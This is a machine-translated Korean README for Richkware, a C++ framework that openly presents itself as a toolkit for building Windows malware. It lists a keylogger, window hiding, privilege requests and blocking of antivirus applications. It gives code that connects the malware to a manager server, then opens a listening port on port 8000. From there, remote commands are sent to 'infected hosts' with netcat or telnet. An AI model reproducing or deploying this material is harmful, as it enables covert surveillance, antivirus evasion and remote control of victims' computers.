C ++로 작성된 Windows Malware 구축을위한 프레임 워크.
Richkware는 네트워크 및 OS 기능 라이브러리로, 맬웨어를 만들 수 있습니다. 이러한 기능의 구성은 응용 프로그램이 다음 유형의 맬웨어를 참조 할 수있는 동작을 가정 할 수있게합니다.
Richkware-Manager-Server : Richkware 프레임 워크를 사용하여 개발 된 맬웨어 인스턴스가있는 호스트 관리를위한 서비스.
Richkware-Manager-Client : Richkware-Manager-Server 의 클라이언트는 서버에서 모든 호스트 목록을 얻고 모든 종류의 명령을 보낼 수 있습니다.
| en | 그것 | |
|---|---|---|
| 프레젠테이션 | ||
| 보고서 |
Storage ( Storage.h ) :
ISADMIN 및 RequestAdMinPrivileges ( Richkware.h ) : 관리자 권한을 확인하고 요구합니다.
StealthWindow ( Richkware.h ) : 응용 프로그램 숨기기;
OpenApp ( richkware.h ) : 열린 임의의 응용 프로그램;
Keylogger ( richkware.h ) : 모든 프레스 키를 파일로 저장합니다.
blockapps e unblockapps ( blockapps.h ) : 블록 및 차단 응용 프로그램 (바이러스러스, ...).
RichKware를 구축하고 사용하기위한 기본 요구 사항입니다.
main.cpp를 열고 Richkware 인스턴스를 만듭니다.
RMS를 배포 한 경우 다음과 같이 맬웨어를 초기화 할 수 있습니다.
int main() {
Richkware richkware("Richk","DefaultPassword","192.168.99.100", "8080", "associatedUser");
...
return 0;
}
Richkware-Manager-Server에서 안전한 키를 얻고 키를 암호화 키로 설정합니다. DefaultPass는 RMS와의 안전한 통신을 보장하기 위해 임시 암호화 키로 사용되며 악성 코드가 암호화 KET를 얻기 위해 RMS에 도달 할 수없는 경우 DefaultPass를 암호화 키로 사용합니다.
그렇지 않으면 RMS를 배포하지 않은 경우 다음을 사용할 수 있습니다.
Richkware richkware("Richk","richktest");
이런 식으로 "RichKtest"를 암호화 키로 사용합니다.
Main.CPP 구현 후 다음과 같이 컴파일 할 수 있습니다.
make
다음 예에서는 Richkware 프레임 워크를 사용하여 개발 된 맬웨어 인 " Server "를 호출하고 서버 생성을위한 기능을 활성화하고 감염된 PC와 연결하려는 맬웨어의 " 클라이언트 " "클라이언트".
Call Framework Function StartingErver 메인에서는 포트에서 서버를 시작합니다. 다음 예제는 TCP 포트 8000입니다. 다른 프로그램에서 포트를 이미 사용하는 경우 프로그램이 중지 될 때까지 해당 포트를 사용할 수 없습니다.
int main () {
...
richkware.network.server.Start("8000");
...
}
Java Virtual Machine이 설치된 모든 시스템에서 Richkware-Manager-Client를 사용할 수 있습니다. 그렇지 않으면 존재하지 않으면 터미널을 쉽게 사용할 수 있습니다.
UNIX 시스템에서는 NetCat을 사용하고 다음 명령을 실행할 수 있습니다.
nc <serverName> 8000
서버가 열린 포트에서 요청을 받았으며 연결을 생성하는 데 성공하면 클라이언트가 연결 설정을 확인하는 클라이언트에 응답하면 다음을 작성할 수 있습니다.
[[1]]COMMAND
여기서 명령은 서버가 실행중인 감염된 호스트에서 실행 해야하는 명령입니다.
Windows에서는 동일한 방식으로 Telnet을 사용할 수 있습니다.
telnet <serverName> 8000
...
[[1]]COMMAND